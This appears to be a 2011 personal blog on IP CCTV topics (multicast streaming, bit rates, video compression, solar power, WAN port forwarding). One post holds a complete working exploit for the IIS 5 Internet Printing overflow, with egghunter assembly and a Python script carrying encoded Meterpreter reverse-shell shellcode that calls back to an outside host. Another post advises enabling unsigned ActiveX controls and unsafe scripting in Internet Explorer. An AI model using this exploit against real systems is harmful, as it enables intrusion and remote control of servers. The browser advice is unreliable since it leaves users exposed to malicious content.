Sunday, August 14, 2011

IP CCTV transmission methods

There are essentially three ways of transmitting video streams over the network from the source to the destination: broadcast, unicast and multicast.

Broadcast
Broadcast is defined as one-to-all communication between the source and the destinations. In IP video surveillance the source is usually the IP camera and the destination is the monitoring station or the recording server. Broadcasting would mean that the IP camera sends the video stream to all monitoring stations and recording servers, and also to every other IP device on the network, even though only a few specific destinations actually requested the stream. This method of transmission is not commonly used in IP video surveillance, but it is common in the TV broadcasting industry, where TV signals are switched at the destination.

Unicast
Unicast is defined as one-to-one communication between the source and the destination. Unicast transmissions are usually carried over TCP or UDP and require a direct connection between the source and the destination. In this scenario the IP camera (source) must be able to accept many concurrent connections when many destinations want to view or record the same video at the same time.
In unicast transmission the IP camera streams one copy of the video feed for each destination that requests it. In figure 1 below, three copies of the same video stream are sent over the network, one for each of the three destinations requesting the stream. If each video stream is 4 Mbps, this transmission produces 12 Mbps (3 x 4 Mbps) of data on multiple network segments.

As a result, many destinations connected in unicast to a video source can result in high network traffic. In other words, if we imagine a large system with 200 destinations requesting the same video stream, we would end up having 800 Mbps (200x4Mbps) of data travelling over the network, which is realistically unmanageable. Although this method of transmission is widely used over the Internet where most routers are not multicast-enabled, within a corporate LAN, unicast transmission is not necessarily the best practice as it can quickly increase the bandwidth needed for viewing and recording camera streams.

Multicast
In multicast transmission there is no direct connection between the source and the destinations. A destination connects to the IP camera's video stream by joining a multicast group, which in simple terms means subscribing to the multicast IP address on which the stream is sent. The IP camera sends only a single copy of the video stream, to that group address, and each destination receives the stream already available on the network with no additional load on the source. In other words, the destinations share the same video stream. In figure 2 below, the same three destinations requesting the video stream have the same impact on the network as a single destination requesting the stream in unicast, and no more than 4 Mbps of data travels on any segment of the network. Even with 200 destinations requesting that video stream, the same amount of data would be travelling on the network.

It is evident at this point that using multicast transmissions in an IP video surveillance application can save a lot of bandwidth, especially in large scale deployments where the number of destinations can grow very quickly.
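The per-segment arithmetic above generalises to any switched topology. The following model is an added example, not part of the original post: it counts the viewers below each segment of a constructed camera / core switch / access switch tree and reports the load each delivery mode puts on it. The 4 Mbps rate is the post's; the tree layout is an assumption.

```python
"""Per-segment load of one camera stream under unicast vs multicast delivery.

Added example (not from the original post). The topology is constructed:
camera -> core switch -> access switches -> monitoring stations, and every
link in that tree is one network segment.
"""
from collections import defaultdict

STREAM_MBPS = 4.0  # the 4 Mbps stream used in the post's figures


def build_tree(viewers_per_access_switch):
    """Return (parent map, viewer set) for the constructed tree.

    viewers_per_access_switch=[3, 0] gives two access switches, the first
    with three monitoring stations and the second with none.
    """
    parent = {"core": "camera"}
    viewers = set()
    for i, count in enumerate(viewers_per_access_switch):
        switch = f"access{i}"
        parent[switch] = "core"
        for j in range(count):
            station = f"viewer{i}_{j}"
            parent[station] = switch
            viewers.add(station)
    return parent, viewers


def segment_load(parent, viewers, mode, rate=STREAM_MBPS):
    """Mbps carried by each segment, keyed "upstream->downstream".

    unicast:   the camera emits one copy per viewer, so a segment carries
               rate * (viewers reachable below it).
    multicast: a segment carries one copy if any group member is below it,
               otherwise nothing (no viewer, no join, no traffic).
    """
    if mode not in ("unicast", "multicast"):
        raise ValueError(f"unknown mode {mode!r}")
    below = defaultdict(int)  # node -> number of viewers at or under it
    for station in viewers:
        node = station
        while node in parent:  # walk up towards the camera
            below[node] += 1
            node = parent[node]
    load = {}
    for node, upstream in parent.items():
        n = below[node]
        copies = n if mode == "unicast" else (1 if n else 0)
        load[f"{upstream}->{node}"] = rate * copies
    return load


def peak_segment_load(viewers_per_access_switch, mode, rate=STREAM_MBPS):
    """Highest per-segment load in the tree (the camera uplink in practice)."""
    parent, viewers = build_tree(viewers_per_access_switch)
    return max(segment_load(parent, viewers, mode, rate).values())


if __name__ == "__main__":
    for layout in ([3], [100, 100]):
        for mode in ("unicast", "multicast"):
            print(f"{sum(layout):>3} viewers, {mode:<9}: "
                  f"peak {peak_segment_load(layout, mode):.0f} Mbps")
```

With the post's numbers the camera uplink carries 12 Mbps for three unicast viewers and 800 Mbps for two hundred, against 4 Mbps in multicast regardless of viewer count; an access switch with no group members below it carries nothing.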


Bandwidth optimisation for IP CCTV
When it comes to IP video surveillance, it is important to manage efficiently the way video streams are transmitted over the network so that the available bandwidth is not overloaded. Even though IT infrastructures are built to handle any kind of data, the applications generating traffic over the IP network need to use the network resources in place efficiently. To this end, IP video surveillance solution providers offer different functionalities and mechanisms that allow bandwidth and network resources to be optimized, such as:
• Multicasting
• Multistreaming
• Video compression

Even though the capacity and speed of the network are constantly increasing and its associated costs are declining, this is still not a good reason for users to ignore the additional investments and efforts needed to optimise bandwidth management. The amount of data travelling on the network is also still on the rise and therefore, investments in bandwidth optimization are ones that can contribute to a reduction in total cost of ownership, specifically in respect to efficiency gains and maximized resources.

For example, in video surveillance, more and more end-users are requesting cameras with higher picture quality and resolution, often opting for high-definition and megapixel cameras. These types of cameras require much more bandwidth than standard definition cameras. Also, more and more people inside as well as outside an organization’s walls are requesting access to video streams over the network. In the case where a large number of users are simultaneously trying to access a specific video stream, efficient use of network resources can be crucial in avoiding overloaded capacity and entire network crashes.
It is equally important to realize that optimizing the bandwidth on the network does not necessarily go hand in hand with large capital investments, but is more a matter of putting the right solutions in place and leveraging the unique and powerful capabilities of these solutions.

Saturday, August 13, 2011

Which Image Quality is Better

When thinking about maximizing image quality, resolution is usually the first thing that comes to mind. However, resolution is not the only factor that impacts quality. The amount of bandwidth available and used can have a dramatic impact on image quality. In this report, we examine bandwidth and the effect that it has on quality across numerous cameras.
Which Image Quality is Better?
To better understand image quality, let's start by examining two samples of the same scene side by side:
 
Consider two questions:
1. Which camera has higher resolution? A or B?
2. Which camera is better? A or B?
It is pretty obvious that the image from Camera B is better, so this should be a simple case.
The reality is that those images are from the same camera at the same resolution and frame rate (720p/30). All that was changed on the camera was the Constant Bit Rate target, from 512 Kb/s to 8 Mb/s.
Factors Impacting Quality:
Even with the same resolution, two common settings impact quality: 
1. Bit Rate: Most cameras can have their bit rate adjusted to specific levels (e.g., 512 Kb/s, 2 Mb/s, 8Mb/s, etc.) 
2. Quantization Level: Most cameras can have the level of compression adjusted (often called a quality or compression setting with options from 1-10 or 0-100)
Typically, these are mutually exclusive. If you lock in bit rate, the camera will automatically adjust the quantization level to not exceed the bandwidth set. Vice versa, if you set the quantization level, the camera will automatically change the bandwidth consumed to make sure the quality / compression always stays at the same level.
Our Test Process
We wanted to better understand how changes in these two factors impact video quality. To do so, we did a series of tests with three HD cameras: the Axis P1344, the Sony CH140 and the Bosch NBN-921.
For the bandwidth tests, we tested each camera at the following levels:
  • 512 Kb/s
  • 1 Mb/s
  • 2 Mb/s
  • 4 Mb/s
  • 8 Mb/s
We did this across a series of scenes to see how quality would vary in different conditions:
  • Daytime Indoors (300 lux)
  • Nighttime Indoors (.5 lux)
  • Daytime Intersection
Finally, we did a similar series of tests varying the quality level of a VBR camera (the Axis across 0, 30, 60 and 100 levels) to better understand changes in quality and bandwidth consumption.

Sunday, July 24, 2011

How to Avoid Getting Hacked video

In 1995, a movie called Hackers debuted, showing the life of a group of hackers and the kind of trouble they can cause. Hacking is still an ongoing problem today and, as a result, has crept into the security market through integrated information systems. In this article I'll share some tips that can help you keep this kind of cyber intrusion away from your home or business.

Generally, most technologically minded people get excited about the idea of being able to turn on lights, view security cameras, and control other gadgets at home with a smartphone. Unfortunately, there are criminals learning how to break into your systems despite increased security and better technology. So as you log in and review footage on your DVR or use the control features of your smart home, a cyber thief could be following your every move. The best way to keep these so-called cyber criminals from hacking into your system is to use encryption. If you leave any part of your system unencrypted, you have already created a huge vulnerability.

Many people in the residential market or in small businesses do not need to go to such extremes as encrypting video feeds. It may be necessary though if you’re trying to protect priceless property or have had issues in the past with people trying to steal certain items.

Some DVRs have a watermark feature to help prevent theft. This feature can help a viewer tell the difference between a genuine feed and a fake. I also recommend changing user names and passwords on a regular basis. You don't want to leave your system with the factory defaults of admin/admin or 12345. Login information like this is what hackers are going to try first. Many customers have asked me to log into their systems, and when I ask them what their user name and password are, they often respond, "I don't know who set it up, I just have it saved to auto log in". This is not a good practice and won't keep your system secure. Remember, if you want to keep your security system safe from hackers, you must first keep it safe from a 5 year old.

Monday, July 18, 2011

How to select the right CCTV video compression

If you are responsible for planning or designing a new CCTV video surveillance system, you have to make a technology choice regarding which video compression technique to use.

For sure, it will be digital. But which video compression scheme is the most suitable for your application?

1. Motion JPEG CCTV video compression
The JPEG standard was developed by the Joint Photographic Expert Group (part of ISO) for efficient storage of individual frames. Motion JPEG or M-JPEG is a series of separate JPEG images that form a video sequence. When 16 JPEG image frames or more are joined together per second, the result is an illusion of motion video. Video reproduction at 30 frames per second (FPS) for NTSC signals or 25 FPS for PAL signals is called full motion video or continuous-motion video.

Motion JPEG is an unlicensed standard and is widely compatible; it suits applications that require low frame rates, or technologies such as video analytics where frame-by-frame analysis is crucial.

Advantages
1. Ability to support multi-megapixel resolution.
2. Ideal for courtroom single frame evidence.
3. Clearer images at lower frame rates than MPEG-4.
4. Frame by frame playback offers more frames to view.
5. Technology is simpler; this can reduce the cost of a camera or video codec.
6. At low bandwidth priority is given to Image Resolution.
Disadvantages
1. High bit rate for scenes with little or no activity increases bandwidth and storage.
2. Video quality deteriorates at higher compression ratios.
3. No M-JPEG standard often means incompatibility issues.
4. Converting M-JPEG into another format reduces video quality.
5. Dated technology superseded by more bandwidth-efficient encoding techniques.

2. MPEG-4 CCTV video compression
MPEG-4 is a compression standard that was introduced in late 1998 by the Moving Picture Experts Group. In video surveillance applications MPEG-4 Part 2, also known as MPEG-4 Visual is the version of MPEG-4 most commonly used. MPEG-4 supports both low-bandwidth applications and those applications that require high quality images, with virtually unlimited bandwidth and no limitations in frame-rate. Typically most MPEG-4 based encoders and cameras support video up to DVD quality.

MPEG-4 is much more efficient than M-JPEG because video frames are analysed prior to being sent across the network. The first compressed image (I frame) is used as a reference point, and the following images contain only the information that differs from that I frame reference image. Periodically, new I frames are transmitted within the video sequence to provide a recent reference point. The distance between these I frames is known as the GOP (Group of Pictures) and is usually user-definable, depending on the application and the activity in the scene. For example, a 25 FPS video stream with a GOP of 50 sends a new I frame every 2 seconds, with only change information in between. The viewing application on the receiving end of the transmission then reconstructs all images from this information and displays the video.

Advantages
1. MPEG-4 is up to 5 times more efficient than M-JPEG at low bandwidths.
2. Increases the amount of time video can be stored compared with M-JPEG.
3. Uses less network bandwidth when compared with M-JPEG.
4. Very efficient at high frame rates.
Disadvantages
1. When the bit-rate is limited video quality suffers.
2. Low efficiency at very low frame-rates or extremely high scene activity.
3. Can be liable to “blurring” on freeze frame or very high motion.

3. H.264 CCTV video compression
H.264 is the latest MPEG standard for video encoding and is geared to take video beyond DVD quality by supporting high-definition CCTV video. H.264 can also reduce the size of digital video by more than 80% compared with M-JPEG and by as much as 50% compared with MPEG-4, all without compromising image quality. This means that much less network bandwidth and storage space are required. Since storage typically represents between 20 and 30 percent of a surveillance project's cost, significant savings can be made.

As in many sectors of our industry, the devil is in the detail, and system integrators and end-users who wish to see the benefits of an IP-based solution should look to someone who really knows the technology and can give an impartial view. It is common sense that manufacturers will only support their own hardware and will promise the earth for it, whereas a distributor will have evaluated a number of solutions from different vendors and be able to say that product A is the best for solution B because of XYZ, whereas product Y is the best for solution C, and so on.

Advantages
1. H.264 cameras reduce the amount of bandwidth needed: if your megapixel camera needed 10 Mb/s before (with M-JPEG), it might now need only 1.5 Mb/s. So for each camera you will save a lot of bandwidth.
2. Eliminates barriers: Enables many more networks to support megapixel cameras.
3. The bitstream is fully compatible with existing decoders with no error/drift.
Disadvantages
1. Using analytics with these cameras reduces the H.264 benefit.
2. Costs a few hundred dollars more per camera.

Saturday, July 16, 2011

ActiveX & DirectX Troubleshooting for Windows 2000 & XP

From time to time I get calls from technicians, engineers, senior engineers and managers saying, "Hi Arindam, I got your reference from XYZ; actually we are facing a problem installing an ActiveX component on a Windows XP PC/laptop." Yes, many sites in India on the Internet use ActiveX or DirectX controls to display web content. If you are having the following issues, the instructions below offer possible solutions. Before applying them you must know the PC administrator password.

Issues:
  • ActiveX or DirectX will not load
  • Windows XP IE with Service Pack 2 not allowing load
The following applies to Windows 2000 and Windows XP, and is meant to be used by experienced PC users ONLY.
  • Open Internet Explorer, click on Tools, click on Internet Options
  • Click on the Security Tab
  • Click to Highlight Internet, click Custom Level button
    • .NET Framework: Run components not signed with Authenticode - click to ENABLE
    • Run components signed with Authenticode - click to ENABLE
    • ActiveX controls and plug-ins
      • Automatic prompting for ActiveX controls - click to ENABLE
      • Binary and scripting behaviors - click to ENABLE
      • Download signed ActiveX controls - click to ENABLE
      • Download unsigned ActiveX controls - click to ENABLE
      • Init and script ActiveX controls not marked as safe - click to ENABLE
      • Run ActiveX controls and plug-ins - click to ENABLE
      • Script ActiveX controls marked safe for scripting - click to ENABLE
  • Downloads
    • Auto prompt for downloads - click to DISABLE
    • File downloads - click to ENABLE
    • Font download - click to ENABLE
  • Java VM
    • Java permissions - click to HIGH SAFETY
    • Access data sources across domains - click to DISABLE
    • Allow META REFRESH - click to ENABLE
    • Allow scripting of IE web-browser controls - click to DISABLE
    • Allow scripting of windows without size or position - click to DISABLE
    • Allow web pages to use restricted protocols for active content - click to PROMPT
    • Display mixed content - click to PROMPT
    • Don't prompt for client certificate selection - click to DISABLE
    • Drag and drop or paste files - click to ENABLE
    • Installation of desktop items - click to PROMPT
    • Launch programs and files in an IFRAME - click to PROMPT
    • Navigate sub-frames across different domains - click to ENABLE
    • Open files based on content, not file extensions - click to ENABLE
    • Software channel permissions - click to MEDIUM SAFETY
    • Submit non-encrypted form data - click to ENABLE
    • Use Pop-up Blocker - click to ENABLE
    • User data persistence - click to ENABLE
    • Web site in less privileged web content zone can navigate - click to ENABLE
  • Scripting
    • Active scripting - click to ENABLE
    • Allow paste operations via script - click to ENABLE
    • Scripting of Java applets - click to ENABLE
  • User Authentication
    • Logon - click to Automatic logon only in Intranet zone
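Once the component is installed, the Internet-zone settings loosened above can be put back to something stricter. The script below is an added example, not part of the original post: it reads the same settings from the current user's Internet zone key and lists those still looser than a baseline. The action IDs are the ones Microsoft documents for the zone registry values; the baseline values are my assumption (roughly IE's Medium level), so adjust them to your own policy.

```python
"""Audit the Internet zone settings the walkthrough above loosens.

Added example, not from the original post. Internet Explorer stores the
per-user Custom Level choices for the Internet zone (zone 3) as DWORD values
under HKCU; each value name is a documented URL action ID and its data is
0 = Enable, 1 = Prompt, 3 = Disable. The baseline below is an assumption,
roughly IE's Medium level; change it to match your own policy.
"""
ZONE3_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"
ENABLE, PROMPT, DISABLE = 0, 1, 3
STRICTNESS = {ENABLE: 0, PROMPT: 1, DISABLE: 2}

# action ID -> (setting as shown in Custom Level, baseline to restore)
BASELINE = {
    "1001": ("Download signed ActiveX controls", PROMPT),
    "1004": ("Download unsigned ActiveX controls", DISABLE),
    "1200": ("Run ActiveX controls and plug-ins", ENABLE),
    "1201": ("Initialize and script ActiveX controls not marked as safe", DISABLE),
    "1405": ("Script ActiveX controls marked safe for scripting", ENABLE),
    "2000": ("Binary and script behaviors", ENABLE),
    "2201": ("Automatic prompting for ActiveX controls", DISABLE),
}


def audit(current, baseline=BASELINE):
    """Return (id, name, current, expected) for every action whose current
    value is looser than the baseline. Values the dialog would not show
    (anything other than 0/1/3) are reported too, as unknown."""
    findings = []
    for action, (name, expected) in baseline.items():
        value = current.get(action)
        if value is None:
            continue  # not set for this user: IE applies the zone template
        if value not in STRICTNESS or STRICTNESS[value] < STRICTNESS[expected]:
            findings.append((action, name, value, expected))
    return findings


def restore_commands(findings, key=ZONE3_KEY):
    """reg.exe commands that put each flagged value back to its baseline."""
    return [
        f'reg add "HKCU\\{key}" /v {action} /t REG_DWORD /d {expected} /f'
        for action, _name, _value, expected in findings
    ]


def read_zone3(actions=tuple(BASELINE), key=ZONE3_KEY):
    """Read the current DWORDs from the registry (Windows only)."""
    import winreg  # standard library on Windows; unavailable elsewhere
    current = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key) as handle:
        for action in actions:
            try:
                current[action], _kind = winreg.QueryValueEx(handle, action)
            except FileNotFoundError:
                pass  # value absent: left at the zone template's default
    return current


if __name__ == "__main__":
    found = audit(read_zone3())
    for action, name, value, expected in found:
        print(f"{action} {name}: is {value}, baseline {expected}")
    for cmd in restore_commands(found):
        print(cmd)
```

Run it from an administrator command prompt after the install; the printed reg commands only touch the values the audit flagged.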

Saturday, June 25, 2011

Components of a stand alone solar PV system for CCTV System


Sunlight to electricity: photovoltaic (PV) technology converts sunlight into electricity and is emerging as a major power source for CCTV because of its numerous environmental and economic benefits and proven reliability. Enough free sunlight falls on earth to supply our energy needs for years to come.
Environmental Benefits: As PV generates electricity from light, PV produces no air pollution or hazardous waste. It doesn't require liquid or gaseous fuel to be transported or combusted.


Economic and Social Benefits: Sunlight is free and abundant. A photovoltaic system allows you to generate electricity and store it for use when needed. Photovoltaics contribute to our energy security; as a young technology, it creates jobs and strengthens the economy. It frees us from uncertainties and dependence on foreign oil.

This energy source is free, clean and highly reliable. PV systems are long-lasting and require little maintenance. The benefits of photovoltaics far outweigh the initial cost of the systems.

Solar Panels (PV Modules)
The DC electricity produced by the solar panel or module(s) is used to charge batteries via a solar charge controller. Any DC appliances that are connected to the battery will need to be fused.  DC lights are normally connected to the charge controller. Any AC appliances are powered via an inverter connected directly to the batteries. NOTE: inverters used in grid tie and stand alone systems are different and should not be interchanged.
Most stand alone PV systems need to be managed properly. Users need to know the limitations of a system and tailor energy consumption according to how sunny it is and the state of charge (SOC) of the battery.
Configuration
The solar panels need to be configured to match the system DC voltage, which is determined by the battery. System voltages are typically 12V DC or 24V DC; larger systems operate at 48V DC.
The operating voltage of a solar panel in a stand-alone system must be high enough to charge the batteries. For example, a 12V battery will require 14.4V to charge it. The solar panel must be able to deliver this voltage to the battery after power losses and voltage drop in the cables and charge controller and in conditions in which the solar cells operate at a high temperature. A solar panel with a Voc of about 20V is required to reliably charge a 12V battery.
Charge Controllers (also called solar controllers or solar regulators)
A charge controller is designed to protect the battery and ensure it has a long working life without impairing the system efficiency. Batteries should not be overcharged, and ensuring that they are not is the controller's main function.
Charge controllers are designed to function as follows:
  • Protect the battery from over-discharge: low voltage disconnect (LVD) disconnects the battery from the load when the battery reaches a certain depth of discharge (DOD).
  • Protect the battery from over-charging by limiting the charging voltage, which is important with sealed batteries; this is usually referred to as high voltage disconnect (HVD).
  • Prevent current flowing back into the solar panel during the night, so-called reverse current.

NOTE: controllers with maximum power point (MPP) tracking ensure that the solar modules operate at their optimal rating and can increase output by 10% or more.
Batteries
The power requirements of stand-alone PV systems are rarely in sync with the battery charging. Appliances and loads need to be powered when there is sufficient solar radiation, but also during overcast weather and during the night. Bad weather may last for several days, and the daily charging and discharging of the batteries takes its toll on them. Batteries that are able to handle constant charging and discharging are known as deep-cycle batteries. Batteries need to have a good charging efficiency, low charging currents and low self-discharge.
Battery Ah Efficiency
The Ah efficiency of a battery describes the relationship between Ah that are put into the battery and the Ah that are taken out. Under ideal conditions a new deep-cycle battery would be 90% efficient.
Choosing the most appropriate battery
The important characteristics to look for are:
  • capacity
  • cycle life
  • price / performance
  • size and space requirements
  • Ah efficiency
  • self-discharge rate
  • installation - vertical or horizontal
  • environmental - will batteries be placed near water supplies or in wildlife parks etc

Friday, June 10, 2011

Blast From The Past

Hi visitor, I am from Kolkata, India. This is a very simple and short tutorial based on my personal experience.
Recently on a test I ran into a Windows 2000 Server running IIS 5 with the Internet Printing module enabled. I was quite surprised by this, but... a shell is a shell, right? Since this was on the job and I wasn't wearing my cowboy hat, I fired up my Windows 2000 VM (who doesn't have one of those?) and went to work. Metasploit has a module for this vuln (exploit/windows/iis/ms01_023_printer) but surprisingly it is pretty flaky. On the first run of the exploit module it did not work, so I took a look at my configuration of IIS again to make sure that everything was set up properly. After confirming the IIS settings I tried the module a couple more times and finally was able to get a shell. I restarted IIS and tried the module a few more times... it was still hit or miss - sometimes it would work on the first try, sometimes it would take three tries. Something was strange....

After breaking out Immunity Debugger it became clear why the exploit did not work every time. According to the Metasploit module the shellcode was being held at an offset from EBX, and with a short assembly stub we jump to that location (see the Metasploit snippet below).

buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V')

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know roughly where in memory our payload will be when we gain control of EIP, this seems like a good place to use an egghunter :) I started out with an existing egghunter (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf) and modified it a little: since I know roughly where in memory my payload is, there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check... I had plenty of bytes to burn ;)

mov edx, ebx #ebx is the area of our starting point
or dx, 0fff
xor dx,0fff #clear out the bottom half of edx for the start of our loop
inc edx #increment edx - this is the start of our loop
nop #abbreviated nops where the original access violation check was
...
...
mov eax, 57303054 #load our egg "W00T"
mov edi, edx #set edi to point at our current location in memory
scas dword ptr es:[edi] #compare our egg to dword at edi
jnz #jump back to the start of our loop (inc edx) if we didnt find the egg
scas dword ptr es:[edi] #compare our egg to the next dword for the 2nd part of the egg
jnz #jump back to the start of our loop (inc edx) if we didnt find the 2nd egg
jmp edi #jump to edi as it points to the first byte after our egg
After implementing the egghunter in the exploit I had no issues getting a shell every time :)

Full exploit below - you will obviously have to change the shellcode for it to work for you -

import urllib2
import sys

shell= "T00WT00W"
shell +="\x90"*(10)

########################################################################################################
# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.170.1 R|msfencode -e x86/alpha_upper -t c #
########################################################################################################
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45"
"\x50\x45\x50\x45\x30\x4d\x59\x4a\x45\x50\x31\x4e\x32\x45\x34"
"\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b\x51"
"\x42\x44\x54\x4c\x4b\x43\x42\x46\x48\x44\x4f\x4f\x47\x50\x4a"
"\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c\x43"
"\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x49\x51\x48\x4f\x44\x4d"
"\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32\x51\x47\x4c\x4b\x50"
"\x52\x42\x30\x4c\x4b\x47\x32\x47\x4c\x45\x51\x48\x50\x4c\x4b"
"\x47\x30\x42\x58\x4b\x35\x4f\x30\x42\x54\x51\x5a\x43\x31\x4e"
"\x30\x50\x50\x4c\x4b\x47\x38\x42\x38\x4c\x4b\x46\x38\x51\x30"
"\x45\x51\x49\x43\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x47\x44\x4c"
"\x4b\x43\x31\x4e\x36\x50\x31\x4b\x4f\x46\x51\x49\x50\x4e\x4c"
"\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4d\x30\x42"
"\x55\x4b\x44\x44\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46\x44"
"\x44\x35\x4a\x42\x50\x58\x4c\x4b\x50\x58\x46\x44\x45\x51\x49"
"\x43\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c"
"\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x48\x50\x4d"
"\x59\x51\x54\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x46\x39"
"\x51\x4a\x46\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c"
"\x4b\x42\x32\x4a\x4b\x4b\x36\x51\x4d\x42\x48\x46\x53\x46\x52"
"\x43\x30\x43\x30\x43\x58\x42\x57\x42\x53\x47\x42\x51\x4f\x50"
"\x54\x43\x58\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x49\x45"
"\x48\x38\x4a\x30\x45\x51\x45\x50\x45\x50\x46\x49\x49\x54\x50"
"\x54\x50\x50\x45\x38\x46\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f"
"\x48\x55\x46\x30\x50\x50\x46\x30\x46\x30\x47\x30\x46\x30\x51"
"\x50\x46\x30\x42\x48\x4b\x5a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"
"\x49\x45\x4a\x37\x42\x4a\x43\x35\x45\x38\x4f\x30\x49\x38\x4f"
"\x5a\x43\x31\x45\x38\x44\x42\x43\x30\x42\x31\x51\x4c\x4c\x49"
"\x4a\x46\x43\x5a\x42\x30\x50\x56\x51\x47\x43\x58\x4a\x39\x49"
"\x35\x43\x44\x43\x51\x4b\x4f\x48\x55\x4d\x55\x4f\x30\x43\x44"
"\x44\x4c\x4b\x4f\x50\x4e\x43\x38\x44\x35\x4a\x4c\x45\x38\x4a"
"\x50\x48\x35\x4f\x52\x50\x56\x4b\x4f\x48\x55\x43\x5a\x43\x30"
"\x43\x5a\x44\x44\x46\x36\x51\x47\x42\x48\x45\x52\x4e\x39\x4f"
"\x38\x51\x4f\x4b\x4f\x48\x55\x4c\x4b\x47\x46\x43\x5a\x51\x50"
"\x42\x48\x45\x50\x42\x30\x43\x30\x43\x30\x50\x56\x42\x4a\x45"
"\x50\x45\x38\x50\x58\x4e\x44\x46\x33\x4b\x55\x4b\x4f\x49\x45"
"\x4a\x33\x46\x33\x43\x5a\x43\x30\x50\x56\x51\x43\x50\x57\x42"
"\x48\x44\x42\x48\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x45\x51"
"\x49\x53\x51\x39\x49\x56\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x4f"
"\x33\x44\x4a\x41\x41")


egghunter="\x8B\xD3\x66\x81\xCA\xFF\x0F\x66\x81\xF2\xFF\x0F\x42\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"


buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156
useragent = 'Shit Bird'
header = {'User-Agent':useragent, 'Host':buff}

req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)
res = urllib2.urlopen(req)
res.close()

Saturday, June 4, 2011

How do I set up IP forwarding/filtering with the Connect WAN

Introduction
The Connect WAN supports four features that provide security and IP traffic forwarding when using incoming or mobile-terminated connections:
1. Network Address Translation (NAT)
2. Generic Routing Encapsulation (GRE) forwarding
3. TCP/UDP port forwarding
4. IP filtering
This document describes each function, how the functions are used in conjunction with each other, and what issues can occur with each if it is not used properly.

Network Address Translation (NAT)
NAT allows the Connect WAN to have a single public IP address on the mobile link, while allowing multiple private IP addressed devices connected to the Ethernet interface. 
Outgoing traffic (mobile initiated) from the private network to the public mobile network assumes the IP address of the public mobile interface.  An internal table tracks which internal IP address made the outgoing request so that responses get sent to the proper requestor.
For example, a workstation at IP address 192.168.1.15 sends a request to www.arindamcctvaccesscontrol.blogspot.com.  The source IP address is changed by the Connect WAN address translation to the public 
Incoming (mobile terminated) traffic is either designated to the Connect WAN itself (i.e. HTTP or telnet connections for configuration or monitoring), or is forwarded to hosts via the Ethernet interface based either on GRE or TCP/UDP port forwarding which is covered below.
NAT provides two main benefits:
1. Security: NAT hides the private IP addresses of the devices on the Connect WAN's Ethernet network.
2. IP address availability: IP addresses are in short supply and cost money. The Connect WAN needs to be provided with only one IP address from the wireless carrier.
NAT is enabled by default on the Connect WAN. It should not be disabled unless there is a specific reason to do so.

Generic Routing Encapsulation (GRE) forwarding
GRE, designated IP protocol number 47, is a transport-layer protocol used by many routers, WAN switches and VPN concentrators to tunnel traffic over a WAN between routers. Note that GRE itself provides no encryption, but protocols such as PPTP can use GRE. IPSec can be encapsulated in GRE (and vice versa). GRE uses IP-in-IP and allows private IP addresses to be tunnelled through a public network.

The Connect WAN provides a simple checkbox to turn on GRE forwarding to pass GRE traffic from the mobile interface through to a router on the Ethernet interface.  Note the Connect WAN only passes GRE traffic and does not terminate it.
Here is an example diagram:
Figure 1 - GRE Forwarding
The HQ router's peer GRE address is the mobile IP address of the Connect WAN, which in this case is 166.213.229.218. The Connect WAN has GRE forwarding enabled and will send to the router's Ethernet WAN port, in this case 192.168.1.2. Typically this connection is a directly connected Ethernet cable.
A similar example is using a GRE tunnel through the Connect WAN and wireless network as a backup WAN connection for a primary Frame Relay connection.

TCP/UDP Port Forwarding
Normally, traffic initiated from a host site to a Connect WAN is blocked by NAT, unless the traffic is destined for the Connect WAN itself. Port forwarding provides a means to pass traffic from the mobile interface to devices connected to the Connect WAN's Ethernet port. There are two main applications where port forwarding is required:
1. Pass application data traffic, such as polls or requests, to Ethernet connected devices, and
2. Pass VPN traffic, such as IPSec-in-UDP, through to routers or VPN appliances.
For example, three devices are attached to the Connect WAN's Ethernet port:
Figure 2 - TCP Port Forwarding
The application uses a protocol that polls the devices using the device IP address and TCP port 502 (which is Modbus). On local LANs and publicly routable IP addresses this is not a problem.
